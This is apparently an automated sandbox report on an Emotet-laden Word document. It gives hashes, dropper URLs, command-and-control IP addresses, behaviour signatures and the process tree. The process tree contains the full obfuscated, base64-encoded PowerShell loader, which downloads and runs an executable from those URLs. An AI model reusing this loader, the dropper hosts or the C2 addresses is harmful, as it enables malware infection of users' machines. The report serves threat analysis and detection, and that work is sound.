Analysis

  • max time kernel
    29s
  • max time network
    31s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    26-10-2020 12:05

General

  • Target

    45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062.doc

  • Size

    167KB

  • MD5

    25c855ae9ffa280bc8397500ef0b1c2e

  • SHA1

    c5f7ffc4f84e2494473277d797207c092bb59adb

  • SHA256

    45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062

  • SHA512

    5ba37671f54c349f74cb370edea971f78794d98ee03c627f1018231682df738943a8eae4b14d7420b20101d494a7ced6c712967ac35c78c4eab6ead4ea987476

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://innhanmacquanaogiare.com/wp-includes/Jh1/

exe.dropper

http://www.edgeclothingmcr.com/indexing/c9/

exe.dropper

https://thepremiumplace.com/wp-content/5/

exe.dropper

https://florinconsultancy.com/wp-content/1/

exe.dropper

https://udaysolopiano.com/wp-content/J/

exe.dropper

https://sanayate.com/wp-includes/hd/

exe.dropper

https://www.jorgecoronel.com/webmaster/kYH/

Extracted

Family

emotet

Botnet

Epoch1

C2

81.214.253.80:443

94.23.62.116:8080

98.103.204.12:443

59.148.253.194:8080

197.232.36.108:80

74.58.215.226:80

79.118.74.90:80

181.123.6.86:80

5.89.33.136:80

137.74.106.111:7080

189.223.16.99:80

187.162.248.237:80

181.61.182.143:80

129.232.220.11:8080

178.211.45.66:8080

45.33.77.42:8080

94.176.234.118:443

128.92.203.42:80

12.162.84.2:8080

212.71.237.140:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3956
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZABpAHIARQBDACcALAAnAHkAcwB0AGUATQAnACkAIAAgADsAIAAgAHMAZQBUAC0ASQB0AEUATQAgAFYAYQBSAGkAYQBCAGwAZQA6AFoANgBvADUAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAFMAWQAnACwAJwBzACcALAAnAGEAbgBhAGcARQByACcALAAnAGUAUABvAEkAbgB0AG0AJwAsACcAVABFAE0ALgBOAGUAVAAuAFMARQBSAFYASQBjACcAKQAgACkAIAAgADsAIAAkAE8AbQBwADIAXwB0AGwAPQAoACcAQgAnACsAKAAnAGkAJwArACcANAB4AG8AcwB0ACcAKQApADsAJABGADAAMwB6AG4AawBmAD0AJABaAHgAOQBhAHoAOQBuACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABMAHkAaAAwAHcANgBtADsAJABRAHIAZgBhADcAbwB0AD0AKAAnAEoAJwArACgAJwBqACcAKwAnAHYAXwAnACkAKwAoACcAZAAyACcAKwAnAF8AJwApACkAOwAgACgAIABHAEUAdAAtAHYAYQByAEkAYQBiAEwARQAgAHEAcAB6AG4AYwAgACkALgB2AGEAbABVAGUAOgA6ACIAQwBSAEUAYABBAHQAZQBEAEkAUgBlAGAAYwBgAFQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGYASgB1AFoAeQAnACsAJwB3ACcAKQArACgAJwB4ACcAKwAnAGkANwBuACcAKQArACcAZgBKACcAKwAoACcAdQBNAG4ANwAnACsAJwBkACcAKwAnADgAbgAnACkAKwAoACcAbQAnACsAJwBmAEoAdQAnACkAKQAgAC0AcgBlAHAAbABhAEMARQAoACcAZgBKACcAKwAnAHUAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAVgB2AGQAawBxAGwAdgA9ACgAKAAnAFoAagAnACsAJwBrACcAKQArACcAbQAnACsAKAAnAGwAbQAnACsAJwAxACcAKQApADsAIAAgACgARwBFAHQALQBWAGEAcgBJAGEAYgBMAEUAIABaADYAbwA1ACkALgBWAEEATAB1AGUAOgA6ACIAcwBFAGAAYwBVAHIAYABJAFQAWQBwAFIAYABvAHQATwBDAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAWAA5AGEAOABtAHQAcAA9ACgAKAAnAEMAcgB5ACcAKwAnAHAAbQAnACkAKwAnAG4AJwArACcAYwAnACkAOwAkAFAAZQBlADcAeQBrAHYAIAA9ACAAKAAnAFIAaQAnACsAJwBlACcAKwAoACcAYgAzAGMAcAAnACsAJwBsACcAKQApADsAJABPAGEAdwBkAGcAZQBhAD0AKAAnAEoAJwArACcAZABmACcAKwAoACcAMQBkACcAKwAnAHcAbAAnACkAKQA7ACQATQBnADAAeABnAGoAeAA9ACgAJwBPAHkAJwArACgAJwBkAGgAegAnACsAJwBxACcAKQArACcANgAnACkAOwAkAFYAYQBzAGEAdwBmAGgAPQAkAEgATwBNAEUAKwAoACgAKAAnAE0AJwArACcAQwBGAFoAeQB3AHgAaQA3ACcAKwAnAG4AJwApACsAJwBNACcAKwAnAEMAJwArACgAJwBGACcAKwAnAE0AbgAnACkAKwAoACcANwBkACcAKwAnADgAbgBtAE0AJwArACcAQwAnACkAKwAnAEYAJwApAC4AIgBSAEUAcABsAGEAYABDAEUAIgAoACgAWwBjAGgAQQBSAF0ANwA3ACsAWwBjAGgAQQBSAF0ANgA3ACsAWwBjAGgAQQBSAF0ANwAwACkALAAnAFwAJwApACkAKwAkAFAAZQBlADcAeQBrAHYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAGEANABzADUAcwA5AD0AKAAoACcAUgA3ACcAKwAnADAAagA4AGEAJwApACsAJwB2ACcAKQA7ACQATwBmAGwAcAB5ADEANwA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAQgBjAEwASQBlAG4AdAA7ACQATgB5AGsAcQBpAGIAagA9ACgAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAOgBbACcAKQArACcAIAB3ACcAKwAnAGUAJwArACgAJwAgAF0AWwAgACcAKwAnAHcAJwApACsAKAAnAGUAJwArACcAIABdACcAKQArACcAaQBuACcAKwAoACcAbgBoAGEAbgBtAGEAJwArACcAYwAnACsAJwBxACcAKQArACcAdQAnACsAKAAnAGEAbgAnACsAJwBhACcAKQArACcAbwAnACsAKAAnAGcAaQAnACsAJwBhAHIAJwApACsAKAAnAGUALgBjACcAKwAnAG8AJwArACcAbQBbACAAdwBlACAAJwArACcAXQB3ACcAKQArACgAJwBwAC0AJwArACcAaQAnACkAKwAnAG4AJwArACgAJwBjAGwAdQAnACsAJwBkAGUAJwArACcAcwBbACAAJwApACsAKAAnAHcAZQAgACcAKwAnAF0ASgBoADEAWwAnACsAJwAgAHcAJwApACsAKAAnAGUAIABdAEAAJwArACcAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAnACkAKwAnAFsAJwArACcAIAB3ACcAKwAoACcAZQAgAF0AJwArACcAWwAgAHcAJwArACcAZQAgACcAKQArACgAJwBdAHcAJwArACcAdwAnACkAKwAoACcAdwAnACsAJwAuAGUAZAAnACkAKwAnAGcAJwArACgAJwBlAGMAbABvAHQAJwArACcAaAAnACkAKwAnAGkAbgAnACsAKAAnAGcAbQAnACsAJwBjACcAKQArACcAcgAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvAG0AJwArACcAWwAnACkAKwAoACcAIAB3ACcAKwAnAGUAIABdACcAKQArACgAJwBpAG4AZABlACcAKwAnAHgAJwApACsAKAAnAGkAJwArACcAbgBnAFsAIAB3AGUAIABdAGMAJwArACcAOQBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0AQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBbACAAdwBlACAAJwApACsAKAAnAF0AJwArACcAWwAgACcAKQArACcAdwAnACsAKAAnAGUAIABdAHQAJwArACcAaABlAHAAJwApACsAKAAnAHIAJwArACcAZQBtAGkAdQAnACsAJwBtAHAAbABhACcAKQArACgAJwBjACcAKwAnAGUALgBjAG8AbQBbACcAKwAnACAAdwAnACkAKwAoACcAZQAgACcAKwAnAF0AdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AJwApACsAJwB0AGUAJwArACcAbgB0ACcAKwAnAFsAJwArACgAJwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdACcAKwAnADUAWwAnACkAKwAoACcAIAB3ACcAKwAnAGUAIAAnACkAKwAoACcAXQAnACsAJwBAAGgAJwArACcAdAB0AHAAJwArACcAcwA6AFsAIAB3ACcAKwAnAGUAIABdAFsAIAB3AGUAIABdACcAKQArACgAJwBmAGwAJwArACcAbwAnACkAKwAoACcAcgBpAG4AYwAnACsAJwBvACcAKQArACcAbgBzACcAKwAoACcAdQBsACcAKwAnAHQAJwApACsAKAAnAGEAJwArACcAbgBjAHkAJwApACsAKAAnAC4AYwAnACsAJwBvAG0AWwAnACkAKwAoACcAIAAnACsAJwB3AGUAJwApACsAJwAgACcAKwAoACcAXQB3AHAALQAnACsAJwBjACcAKQArACgAJwBvAG4AdAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAWwAgACcAKQArACgAJwB3AGUAJwArACcAIAAnACkAKwAnAF0AJwArACcAMQAnACsAJwBbACAAJwArACgAJwB3AGUAIAAnACsAJwBdAEAAJwArACcAaAB0ACcAKQArACcAdAAnACsAJwBwACcAKwAnAHMAJwArACgAJwA6AFsAJwArACcAIAAnACkAKwAnAHcAZQAnACsAKAAnACAAXQBbACcAKwAnACAAJwApACsAJwB3AGUAJwArACcAIABdACcAKwAoACcAdQAnACsAJwBkAGEAJwApACsAKAAnAHkAJwArACcAcwBvAGwAbwBwAGkAYQBuAG8ALgAnACsAJwBjACcAKwAnAG8AbQBbACAAJwApACsAJwB3ACcAKwAoACcAZQAgACcAKwAnAF0AdwBwAC0AJwArACcAYwBvAG4AJwApACsAKAAnAHQAZQAnACsAJwBuACcAKQArACcAdABbACcAKwAnACAAdwAnACsAKAAnAGUAIABdAEoAJwArACcAWwAnACkAKwAnACAAJwArACcAdwAnACsAJwBlACcAKwAoACcAIABdACcAKwAnAEAAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAcwAnACsAJwA6AFsAJwApACsAJwAgACcAKwAnAHcAJwArACcAZQAnACsAKAAnACAAXQAnACsAJwBbACAAdwBlACcAKQArACcAIAAnACsAKAAnAF0AcwBhACcAKwAnAG4AJwApACsAJwBhAHkAJwArACgAJwBhACcAKwAnAHQAZQAnACkAKwAoACcALgAnACsAJwBjAG8AJwApACsAJwBtAFsAJwArACcAIAAnACsAKAAnAHcAZQAgAF0AJwArACcAdwAnACkAKwAnAHAAJwArACgAJwAtACcAKwAnAGkAbgBjACcAKwAnAGwAdQBkAGUAJwApACsAJwBzACcAKwAnAFsAJwArACgAJwAgAHcAZQAnACsAJwAgACcAKQArACgAJwBdAGgAZABbACAAdwBlACAAJwArACcAXQAnACsAJwBAACcAKwAnAGgAdAB0AHAAJwArACcAcwAnACkAKwAnADoAJwArACcAWwAnACsAKAAnACAAJwArACcAdwBlACAAXQAnACsAJwBbACAAdwBlACAAXQB3AHcAdwAnACkAKwAnAC4AJwArACgAJwBqAG8AJwArACcAcgAnACkAKwAnAGcAZQAnACsAKAAnAGMAJwArACcAbwByACcAKQArACcAbwAnACsAKAAnAG4AZQAnACsAJwBsACcAKwAnAC4AYwAnACsAJwBvAG0AWwAgACcAKQArACgAJwB3ACcAKwAnAGUAIABdAHcAZQBiACcAKQArACcAbQAnACsAKAAnAGEAJwArACcAcwB0ACcAKQArACgAJwBlAHIAWwAnACsAJwAgACcAKQArACgAJwB3ACcAKwAnAGUAIABdAGsAWQAnACkAKwAoACcASABbACcAKwAnACAAdwAnACkAKwAnAGUAJwArACcAIABdACcAKQAuACIAUgBFAHAAbABBAGAAYwBlACIAKAAoACgAJwBbACcAKwAnACAAdwAnACkAKwAoACcAZQAnACsAJwAgAF0AJwApACkALAAnAC8AJwApAC4AIgBzAGAAUABMAEkAdAAiACgAJABWADYAagA3AHEAegAxACAAKwAgACQARgAwADMAegBuAGsAZgAgACsAIAAkAEsAcAB0AHQAYgA0ADYAKQA7ACQARwB5AGEAYwA1ADUAbgA9ACgAKAAnAEcAeAAwAGsAJwArACcAawAnACkAKwAnAG4AagAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE8AZQAwAHEAdgBiAGcAIABpAG4AIAAkAE4AeQBrAHEAaQBiAGoAKQB7AHQAcgB5AHsAJABPAGYAbABwAHkAMQA3AC4AIgBkAGAATwBgAFcAbgBMAG8AYQBkAGYASQBsAGUAIgAoACQATwBlADAAcQB2AGIAZwAsACAAJABWAGEAcwBhAHcAZgBoACkAOwAkAEMAcgBvADUAZwAwAGMAPQAoACgAJwBIACcAKwAnAHMAZABvACcAKQArACgAJwBfACcAKwAnAHAAbAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABWAGEAcwBhAHcAZgBoACkALgAiAGwAYABFAG4AYABHAFQAaAAiACAALQBnAGUAIAA0ADcAMQA3ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAXwBQACcAKwAnAHIAbwBjACcAKQArACgAJwBlAHMAJwArACcAcwAnACkAKQApAC4AIgBDAHIARQBgAEEAVABFACIAKAAkAFYAYQBzAGEAdwBmAGgAKQA7ACQAQQBhAGoAXwBzADUAYQA9ACgAKAAnAEgAJwArACcAdwA1ADEAcQAnACkAKwAnAGEAYgAnACkAOwBiAHIAZQBhAGsAOwAkAFoAcQB2AHAAYgAzAGsAPQAoACgAJwBBADQAJwArACcAbAAxACcAKQArACcAMABhACcAKwAnADYAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAGoAagBtAF8AdgB2AD0AKAAnAEsAbAAnACsAKAAnADcAbgBpACcAKwAnAGwANgAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1616
  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3980
    • C:\Windows\SysWOW64\mssitlb\quartz.exe
      "C:\Windows\SysWOW64\mssitlb\quartz.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2964

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • C:\Windows\SysWOW64\mssitlb\quartz.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • memory/1616-9-0x00000145D1400000-0x00000145D1401000-memory.dmp
    Filesize

    4KB

  • memory/1616-7-0x00007FFCC73E0000-0x00007FFCC7DCC000-memory.dmp
    Filesize

    9.9MB

  • memory/1616-8-0x00000145D1210000-0x00000145D1211000-memory.dmp
    Filesize

    4KB

  • memory/2964-17-0x00000000004D0000-0x00000000004E3000-memory.dmp
    Filesize

    76KB

  • memory/2964-16-0x0000000000460000-0x0000000000475000-memory.dmp
    Filesize

    84KB

  • memory/2964-14-0x0000000000000000-mapping.dmp
  • memory/3956-4-0x000002B073C0C000-0x000002B073C11000-memory.dmp
    Filesize

    20KB

  • memory/3956-6-0x000002B07DA4A000-0x000002B07DA5B000-memory.dmp
    Filesize

    68KB

  • memory/3956-5-0x000002B073C0C000-0x000002B073C11000-memory.dmp
    Filesize

    20KB

  • memory/3956-0-0x00007FFCCEE20000-0x00007FFCCF457000-memory.dmp
    Filesize

    6.2MB

  • memory/3956-3-0x000002B07D84D000-0x000002B07D85E000-memory.dmp
    Filesize

    68KB

  • memory/3956-2-0x000002B07D85E000-0x000002B07D861000-memory.dmp
    Filesize

    12KB

  • memory/3956-1-0x000002B07D84D000-0x000002B07D85E000-memory.dmp
    Filesize

    68KB

  • memory/3980-12-0x00000000005D0000-0x00000000005E5000-memory.dmp
    Filesize

    84KB

  • memory/3980-13-0x00000000005F0000-0x0000000000603000-memory.dmp
    Filesize

    76KB